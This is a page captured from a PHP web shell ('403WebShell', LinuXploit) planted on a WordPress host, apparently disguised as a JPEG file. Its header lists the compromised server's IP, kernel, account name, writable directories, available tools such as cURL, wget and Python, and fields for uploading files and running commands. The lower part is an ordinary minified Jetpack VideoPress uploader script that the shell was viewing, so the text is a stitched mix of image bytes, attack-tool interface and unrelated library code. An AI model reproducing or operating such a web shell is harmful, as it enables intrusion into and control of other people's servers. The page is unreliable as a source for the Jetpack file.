????JFIF??x?x????'403WebShell
403Webshell
Server IP : 104.21.48.1  /  Your IP : 216.73.216.243
Web Server : LiteSpeed
System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User : tempvsty ( 647)
PHP Version : 8.0.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/./self/cwd/wp-content/plugins/jetpack/_inc/build/videopress/js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/./self/cwd/wp-content/plugins/jetpack/_inc/build/videopress/js/videopress-plupload.min.js
(()=>{var e,t,r,o;window.wp=window.wp||{},e=wp,t=jQuery,"undefined"!=typeof _wpPluploadSettings&&(r=function(i){var a,n,s=this,d=-1!==navigator.userAgent.indexOf("Trident/")||-1!==navigator.userAgent.indexOf("MSIE "),p={container:"container",browser:"browse_button",dropzone:"drop_element"};if(this.supports={upload:r.browser.supported},this.supported=this.supports.upload,this.supported){for(a in this.plupload=t.extend(!0,{multipart_params:{}},r.defaults),this.container=document.body,t.extend(!0,this,i),this)t.isFunction(this[a])&&(this[a]=t.proxy(this[a],this));for(a in p)this[a]&&(this[a]=t(this[a]).first(),this[a].length?(this[a].prop("id")||this[a].prop("id","__wp-uploader-id-"+r.uuid++),this.plupload[p[a]]=this[a].prop("id")):delete this[a]);(this.browser&&this.browser.length||this.dropzone&&this.dropzone.length)&&(d||"flash"!==plupload.predictRuntime(this.plupload)||this.plupload.required_features&&Object.hasOwn(this.plupload.required_features,"send_binary_string")||(this.plupload.required_features=this.plupload.required_features||{},this.plupload.required_features.send_binary_string=!0),this.uploader=new plupload.Uploader(this.plupload),delete this.plupload,this.param(this.params||{}),delete this.params,void 0!==e.VideoPress?o=e.VideoPress:window.console&&window.console.error("The VideoPress object was not loaded. Errors may occur."),n=function(e,t,o){o.attachment&&o.attachment.destroy(),r.errors.unshift({message:e||pluploadL10n.default_error,data:t,file:o}),s.error(e,t,o)},this.uploader.bind("init",(function(e){var o,i,a,n=s.dropzone;if(a=s.supports.dragdrop=e.features.dragdrop&&!r.browser.mobile,n){if(n.toggleClass("supports-drag-drop",!!a),!a)return n.unbind(".wp-uploader");n.bind("dragover.wp-uploader",(function(){o&&clearTimeout(o),i||(n.trigger("dropzone:enter").addClass("drag-over"),i=!0)})),n.bind("dragleave.wp-uploader, drop.wp-uploader",(function(){o=setTimeout((function(){i=!1,n.trigger("dropzone:leave").removeClass("drag-over")}),0)})),s.ready=!0,t(s).trigger("uploader:ready")}})),this.uploader.bind("postinit",(function(e){e.refresh(),s.init()})),this.uploader.init(),this.browser?this.browser.on("mouseenter",this.refresh):(this.uploader.disableBrowse(!0),t("#"+this.uploader.id+"_html5_container").hide()),this.uploader.bind("FilesAdded",(function(e,t){for(const e of t){var o,i;if(plupload.FAILED===e.status)return;o={file:e,uploading:!0,date:new Date,filename:e.name,menuOrder:0,uploadedTo:wp.media.model.settings.post.id,...Object.fromEntries(Object.entries(e).filter((([e])=>"loaded"===e||"size"===e||"percent"===e)))},(i=/(?:jpe?g|png|gif|webp)$/i.exec(e.name))&&(o.type="image",o.subtype="jpg"===i[0]?"jpeg":i[0]),e.attachment=wp.media.model.Attachment.create(o),r.queue.add(e.attachment),s.added(e.attachment)}e.refresh(),e.start()})),this.uploader.bind("UploadProgress",(function(e,t){t.attachment.set(Object.fromEntries(Object.entries(t).filter((([e])=>"loaded"===e||"percent"===e)))),s.progress(t.attachment)})),this.uploader.bind("FileUploaded",(function(e,t,i){try{i=JSON.parse(i.response)}catch(e){return n(pluploadL10n.default_error,e,t)}i=void 0!==i.media?o.handleRestApiResponse(i,t):o.handleStandardResponse(i,t);for(const e of["file","loaded","size","percent"])t.attachment.unset(e);t.attachment.set({...i.data,uploading:!1});var a=wp.media.model.Attachment.get(i.data.id,t.attachment);void 0!==i.media&&a.sync("read").then((function(e){wp.media.model.Attachment.get(a.id).set(e)})),r.queue.all((function(e){return!e.get("uploading")}))&&(o&&o.resetToOriginalOptions(e),r.queue.reset()),s.success(t.attachment)})),this.uploader.bind("Error",(function(e,t){var i=pluploadL10n.default_error;for(var a in r.errorMap)if(t.code===plupload[a]){"function"==typeof(i=r.errorMap[a])&&(i=i(t.file,t));break}if("response"in t)try{var s=JSON.parse(t.response);"object"==typeof s&&("errors"in s&&"object"==typeof s.errors&&(s=s.errors.shift()),"message"in s&&(i=s.message))}catch{}n(i,t,t.file),o&&o.resetToOriginalOptions(e),e.refresh()})),this.uploader.bind("UploadComplete",(function(e){o&&o.resetToOriginalOptions(e)})),this.uploader.bind("BeforeUpload",(function(e,t){void 0!==t.videopress&&(o.originalOptions.url=e.getOption("url"),o.originalOptions.multipart_params=e.getOption("multipart_params"),o.originalOptions.file_data_name=e.getOption("file_data_name"),e.setOption("file_data_name","media[]"),e.setOption("url",t.videopress.upload_action_url),e.setOption("headers",{Authorization:'X_UPLOAD_TOKEN token="'+t.videopress.upload_token+'" blog_id="'+t.videopress.upload_blog_id+'"'}))})))}},t.extend(r,_wpPluploadSettings),r.uuid=0,r.errorMap={FAILED:pluploadL10n.upload_failed,FILE_EXTENSION_ERROR:pluploadL10n.invalid_filetype,IMAGE_FORMAT_ERROR:pluploadL10n.not_an_image,IMAGE_MEMORY_ERROR:pluploadL10n.image_memory_exceeded,IMAGE_DIMENSIONS_ERROR:pluploadL10n.image_dimensions_exceeded,GENERIC_ERROR:pluploadL10n.upload_failed,IO_ERROR:pluploadL10n.io_error,HTTP_ERROR:pluploadL10n.http_error,SECURITY_ERROR:pluploadL10n.security_error,FILE_SIZE_ERROR:function(e){return pluploadL10n.file_exceeds_size_limit.replace("%s",e.name)}},t.extend(r.prototype,{param:function(e,r){if(1===arguments.length&&"string"==typeof e)return this.uploader.settings.multipart_params[e];arguments.length>1?this.uploader.settings.multipart_params[e]=r:t.extend(this.uploader.settings.multipart_params,e)},init:function(){},error:function(){},success:function(){},added:function(){},progress:function(){},complete:function(){},refresh:function(){var e,r,o,i;if(this.browser){for(e=this.browser[0];e;){if(e===document.body){r=!0;break}e=e.parentNode}r||(i="wp-uploader-browser-"+this.uploader.id,(o=t("#"+i)).length||(o=t('<div class="wp-uploader-browser" />').css({position:"fixed",top:"-1000px",left:"-1000px",height:0,width:0}).attr("id","wp-uploader-browser-"+this.uploader.id).appendTo("body")),o.append(this.browser))}this.uploader.refresh()}}),r.queue=new wp.media.model.Attachments([],{query:!1}),r.errors=new Backbone.Collection,e.Uploader=r)})();

Youez - 2016 - github.com/yon3zu
LinuXploit